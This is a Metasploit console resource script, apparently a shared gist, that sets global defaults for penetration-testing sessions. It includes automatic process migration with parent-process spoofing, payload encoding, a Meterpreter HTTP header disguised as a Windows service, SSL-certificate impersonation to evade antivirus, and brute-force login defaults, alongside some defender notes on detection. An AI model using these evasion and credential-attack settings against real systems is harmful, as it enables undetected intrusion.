@ricardojba
Last active February 26, 2024 22:54
# Metasploit console resource script: logging, feature flags, global datastore
# defaults (setg) and the console prompt.

# --- Logging ---
# Console and session logs are written to disk and can contain captured
# credentials and target output; keep the log directory access-restricted.
# NOTE(review): framework help describes LogLevel as 0-3; confirm how 5 is treated.
set LogLevel 5
set ConsoleLogging true
set SessionLogging true
set TimestampOutput true
# --- Feature flags ---
# Flag names differ between Metasploit versions; `features print` lists the ones
# the installed version knows about.
features set dns_feature true
features set postgres_session_type true
features set mssql_session_type true
features set mysql_session_type true
features set wrapped_tables true
features set fully_interactive_shells true
features set datastore_fallbacks true
features set metasploit_payload_warnings true
# features set defer_module_loads true
features set hierarchical_search_table true
# set HTTPTrace true
# spool /home/vibrio/.msf4/all_output.txt
# load sounds verbose=true
# --- Global defaults (setg applies to every module used afterwards) ---
# migrate and perform PPID Spoofing: autorunscript runs this post module on each new session.
# Defender note: a spoofed parent appears as a mismatch between the reported parent
# and the actual creating process, where process-creation telemetry records both.
setg autorunscript post/windows/manage/migrate PPID_NAME="explorer.exe"
setg PrependMigrate true
setg VERBOSE true
# THREADS is global here, so it also sets the concurrency of login scanners (see the
# credential options below). ABORT_ON_LOCKOUT only helps in modules that can detect
# a lockout - verify per module.
setg THREADS 50
setg EXITFUNC thread
setg ABORT_ON_LOCKOUT true
setg cmdstager::ssl true
# Server header sent by the HTTP(S) handler. Defender note: the value is
# operator-chosen, so a Server header alone does not identify a genuine Windows HTTP service.
setg MeterpreterServerName "Microsoft-HTTPAPI/2.0"
setg EnableContextEncoding true
setg EnableStageEncoding true
# Keep the handler running after the first session is opened.
setg ExitOnSession false
# https://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
# Symantec and other products detect the SSL certificate of the reverse_https shellcode.
# Use auxiliary/gather/impersonate_ssl and then use the impersonated certificate on the reverse_https shellcode by using the options handlersslcert and stagerverifysslcert
# Defender note: the copy mirrors the original certificate's fields but does not chain
# to the original issuer, so chain validation (not subject-string matching) distinguishes it.
# The path below is specific to the author's machine and loot directory. The PEM is
# presumably a unified certificate-plus-key file; keep its permissions restrictive.
setg handlersslcert /home/vibrio/.msf4/loot/20210921081839_default_173.194.76.99_173.194.76.99_pe_946125.pem
setg stagerverifysslcert true
# set ReverseListenerBindAddress 192.168.1.1
# set ReverseListenerBindPort 4444
# set Proxies http:127.0.0.1:8080 # HTTP Proxy
# set Proxies socks:127.0.0.1:9050 # SOCKS Proxy
# set Proxies ni:192.168.1.1:3299 # SAP Router
# Placeholder value. Keep a real API key out of any shared or published copy of this file.
setg SHODAN_APIKEY foooooooooooooooooooooooooooo
# SRVHOST 0.0.0.0 binds module-hosted services on every interface; a specific
# interface address limits exposure.
setg SRVHOST 0.0.0.0
setg SRVPORT 5555
# Placeholder: 1.1.1.1 is a publicly routed third-party address and has to be replaced
# with the operator's own listener address before use.
setg LHOST 1.1.1.1
setg LPORT 4444
# Login scanners: also try every username and password stored in the database, in
# addition to PASS_FILE.
setg DB_ALL_PASS true
setg DB_ALL_USER true
# Presumably consumed by the MSSQL modules (SQL login rather than Windows authentication) - confirm.
setg USE_WINDOWS_AUTHENT false
# Depends on a SecLists checkout in the home directory.
# NOTE(review): confirm that `~` is expanded for this option; an absolute path avoids the question.
setg PASS_FILE ~/SecLists/Passwords/Common-Credentials/best1050.txt
# db_connect -y ~/.msf4/database.yml
# --- Prompt format specifiers ---
# %D = Current local directory
# %H = Host name
# %J = Current number of jobs running
# %L = Local IP
# %S = Current number of open sessions
# %T = Timestamp
# %U = Username
# %W = Current workspace (used in the prompt below)
# %red, %whi, %blu, %grn and %yel select the colour of the text that follows.
set PROMPT %red[LHOST:%L]%whi[Workspace:%W]%blu[Jobs:%J]%grn[Sessions:%S]%yel[%D]